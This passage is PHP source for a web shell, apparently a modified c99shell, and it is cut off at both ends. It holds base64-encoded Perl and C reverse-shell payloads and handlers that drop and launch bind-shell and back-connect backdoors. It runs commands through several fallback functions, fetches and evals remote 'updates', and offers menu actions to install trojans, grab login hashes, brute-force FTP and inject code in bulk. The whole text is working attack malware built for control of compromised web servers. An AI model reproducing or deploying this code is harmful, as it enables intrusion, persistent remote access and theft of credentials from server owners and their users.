HYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + +$backdoor=""; + +function checkproxyhost(){ +$host = getenv("HTTP_HOST"); +$filename = '/tmp/.setan/xh'; +if (file_exists($filename)) { +$_POST['proxyhostmsg']="

    Success!

    $host:6543

    Note: If '$host' have a good firewall or IDS installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.

    "; +} else { +$_POST['proxyhostmsg']="

    Failed!

    Note: If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.

    "; + } +} + +if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd")) +{ + $ip = gethostbyname($_SERVER["HTTP_HOST"]); + $por = $_POST['backconnectport']; + if(is_writable(".")){ + cfb("shbd",$backdoor); + ex("chmod 777 shbd"); + $cmd = "./shbd $por"; + exec("$cmd > /dev/null &"); + $scan = myshellexec("ps aux"); + if(eregi("./shbd $por",$scan)){ $data = ("\n

    Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n
    Process not found running, backdoor not setup successfully."); } + $_POST['backcconnmsg']="To connect, use netcat and give it the command 'nc $ip $por'.$data"; + }else{ + cfb("/tmp/shbd",$backdoor); + ex("chmod 777 /tmp/shbd"); + $cmd = "./tmp/shbd $por"; + exec("$cmd > /dev/null &"); + $scan = myshellexec("ps aux"); + if(eregi("./shbd $por",$scan)){ $data = ("\n

    Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n
    Process not found running, backdoor not setup successfully."); } + $_POST['backcconnmsg']="To connect, use netcat and give it the command 'nc $ip $por'.$data"; +} +} + +if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl")) +{ + if(is_writable(".")){ + cf("back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; + if (file_exists("back")) { unlink("back"); } + }else{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; + if (file_exists("/tmp/back")) { unlink("/tmp/back"); } +} +} + +if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C")) +{ + if(is_writable(".")){ + cf("backc",$back_connect_c); + ex("chmod 777 backc"); + //$blah = ex("gcc back.c -o backc"); + $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; + //if (file_exists("back.c")) { unlink("back.c"); } + if (file_exists("backc")) { unlink("backc"); } + }else{ + ex("chmod 777 /tmp/backc"); + cf("/tmp/backc",$back_connect_c); + //$blah = ex("gcc -o /tmp/backc /tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; + //if (file_exists("back.c")) { unlink("back.c"); } + if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } } +} + +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} + +function cfb($fname,$text) +{ + $w_file=@fopen($fname,"w") or bberr(); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} + +function err() +{ +$_POST['backcconnmsge']="

    Error: Can't connect!"; +} + +function bberr() +{ +$_POST['backcconnmsge']="

    Error: Can't backdoor host!"; +} + +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +//EoW + + + + + + + + + + + + + + + + +//Start Enumerate function +//function ENUMERATE() + +// $hostname_x=php_uname(n); +// $itshome = getcwd(); +// $itshome = str_replace("/home/","~",$itshome); +// $itshome = str_replace("/public_html","/x2300.php",$itshome); +// $enumerate = "http://".$hostname_x."/".$itshome.""; + +//End Enumerate function + +//Starting calls +ini_set("max_execution_time",0); +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +$adires=""; +@ignore_user_abort(TRUE); +@set_magic_quotes_runtime(0); +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +define("starttime",getmicrotime()); +if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.3.37"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "sniperxcode v.".$shver.": access denied"; + +$gzipencode = TRUE; //Encode with gzip? + +$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) + +$c99sh_updateurl = "http://sniperxcode.com/files/lshell_update/"; //Update server +$c99sh_sourcesurl = "http://sniperxcode.com/"; //Sources-server + +$filestealth = TRUE; //if TRUE, don't change modify- and access-time + +$donated_html = "
    sniperxcode modded by ssniperxcode
    "; +/* If you publish free shell and you wish +add link to your site or any other information, +put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = TRUE; //If TRUE then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + 'html'=>array('html','htm','shtml'), + 'txt'=>array('txt','conf','bat','sh','js','bak','doc','log','sfc','cfg','htaccess','passwd','shadow'), + 'exe'=>array('sh','install','bat','cmd'), + 'ini'=>array('ini','inf'), + 'code'=>array('php','phtml','php3','php4','inc','tcl','h','c','cpp','py','cgi','pl'), + 'img'=>array('gif','png','jpeg','jfif','jpg','jpe','bmp','ico','tif','tiff','avi','mpg','mpeg'), + 'sdb'=>array('sdb'), + 'phpsess'=>array('sess'), + 'download'=>array('exe','com','pif','src','lnk','zip','rar','gz','tar') +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} +$dizin = str_replace("\\\\","\\",$dizin); +$dizinispd = htmlspecialchars($dizin); +/*dizin*/ +$real = realpath($dizinispd); +$path = basename ($PHP_SELF); +function dosyayicek($link,$file) +{ + $fp = @fopen($link,'r'); + while(!feof($fp)) + { + $cont.= fread($fp,1024); + } + fclose($fp); + + $fp2 = @fopen($file,"w"); + fwrite($fp2,$cont); + fclose($fp2); +} + + + + +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: +0 - files and folders (as default), +1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "" (default) + string {closetag} - close html-tag, e.g. "" (default) + bool {break} - if TRUE and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,'',''), // example + array("config.php",1), // example + array("settings.php",1), + array("connect.php",1) +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range('a','z'); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = 'c99'; // default password for binding +$bindport_port = '31373'; // default port for binding +$bc_port = '5992'; // default port for back-connect +$datapipe_localport = '8081'; // default port for datapipe +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + +$sess_cookie = "c99shvars"; // Cookie-variable name + +$usefsbuff = TRUE; //Buffer-function +$copy_unset = FALSE; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("\"Home\"",$surl), + array("\"Back\"","#\" onclick=\"history.back(1)"), + array("\"Forward\"","#\" onclick=\"history.go(1)"), + array("\"UPDIR\"",$surl."act=ls&d=%upd&sort=%sort"), + array("\"Refresh\"",""), + array("\"Search\"",$surl."act=search&d=%d"), + array("\"Buffer\"",$surl."act=fsbuff&d=%d"), + array("

    [String/Hash Tools]",$surl."act=encoder&d=%d"), + array("[Tools]",$surl."act=tools&d=%d"), + array("[Processes]",$surl."act=processes&d=%d"), + array("[FTP Brute Force]",$surl."act=ftpquickbrute&d=%d"), + array("[System Information]",$surl."act=security&d=%d"), + array("[SQL Shell]",$surl."act=sql&d=%d"), + array("[Kernel Exploit Search]",$millink), + array("[Execute PHP Code]",$surl."act=eval&d=%d"), + array("[PHP Info]
    ",$surl."act=phpinfo&d=%d") +); +$quicklaunch2 = array( + array("
    [Install Trojan/Backdoor]",$surl.'act=trojan'), + array("[Bind Shell Backdoor]",$surl.'act=shbd'), + array("[Back-Connection]",$surl.'act=backc'), + array("[Mass Code Injection]",$surl.'act=massbrowsersploit'), + array("[Exploits]",$surl.'act=exploits'), + array("[Grab Login Hashes]",$surl.'act=grablogins'), + array("[Suicide Script]
    ",$surl.'act=selfremove') +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/Next code isn't for editing\/ +/*function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +}*/ +/*function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} + +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(0); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +}*/ +/*function err($n,$txt='') +{ +echo '
    '; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '
    '; +return null; +}*/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("x2300 Shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
    "," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); + +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink(html_entity_decode($o));} + else {return FALSE;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists('tabsort')) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists('view_perms')) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} + elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} + else {return "".view_perms(fileperms($o))."";} +} +} +if (!function_exists("c99getsource")) +{ +function c99getsource($fn) +{ + global $c99sh_sourcesurl; + $array = array( + "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", + "c99sh_bindport.c" => "c99sh_bindport_c.txt", + "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", + "c99sh_backconn.c" => "c99sh_backconn_c.txt", + "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", + "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} + else {return FALSE;} +} +} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate($update = TRUE) +{ + $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually here.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by Locous7Shell.SQL v. ".$shver." +# Home page: http://www.sniperxcode.com +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + 